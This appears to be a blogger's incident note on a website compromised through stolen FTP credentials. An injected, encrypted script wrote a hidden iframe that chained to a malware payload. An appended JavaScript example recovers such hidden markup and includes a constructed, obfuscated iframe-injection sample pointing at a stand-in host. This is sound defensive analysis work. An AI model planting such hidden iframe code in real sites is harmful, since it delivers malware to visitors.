I was able to confirm the site was compromised without running the code on a VM or changing with noscript on my machine by replacing all document.write() calls with alert().
Just as expected, there was a nice iframe. Using wget I then confirmed that the iframe redirected to another iframe, which redirected to a payload. The same network delivering the payload had also uploaded the modified files via FTP a few days earlier.
Since I found no cracking attempts on the site’s FTP account, I’m thinking the client’s client machine is part of the happy botnet.
This is the first time I’ve run into an encrypted iframe and thought it was interesting.
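
The document.write() replacement described above, as an added example that is not part of the original post: instead of alert(), the write calls are swapped for a recorder so the hidden markup comes back as a string and the iframe target can be extracted. The sample script, the example.invalid URL and the function names `captureWrites` and `iframeSources` are constructed for illustration.

```javascript
// Constructed sample: a harmless stand-in for an injected, obfuscated script.
// The hidden markup points at example.invalid, which never resolves.
const SAMPLE = [
  "var s = '%3Cifram' + 'e src%3D%22http%3A//example.invalid/in.php%22 ';",
  "s += 'width%3D%221%22 height%3D%221%22%3E%3C/iframe%3E';",
  "document.write(unescape(s));",
].join('\n');

// Run the script text with document.write()/writeln() swapped for a recorder,
// the same idea as swapping them for alert(), but the output is kept as data.
// This still executes the sample's own logic, and new Function() is not a
// sandbox: do it only on an isolated analysis host.
function captureWrites(scriptText) {
  const written = [];
  const record = (...parts) => { written.push(parts.join('')); };
  const fakeDocument = { write: record, writeln: record };
  const fakeWindow = { document: fakeDocument };
  // Shadow the names the script is expected to touch; nothing is rendered,
  // so no iframe is ever fetched.
  const run = new Function('document', 'window', 'alert', scriptText);
  run(fakeDocument, fakeWindow, record);
  return written.join('');
}

// Pull iframe targets out of the recovered markup for follow-up (wget, logs).
function iframeSources(html) {
  const found = [];
  const re = /<iframe\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    found.push(m[1] ?? m[2] ?? m[3]);
  }
  return found;
}

const recovered = captureWrites(SAMPLE);
console.log(recovered);
console.log(iframeSources(recovered));
```

If the recovered markup is itself another script that writes again, feed it back through `captureWrites` until plain markup remains.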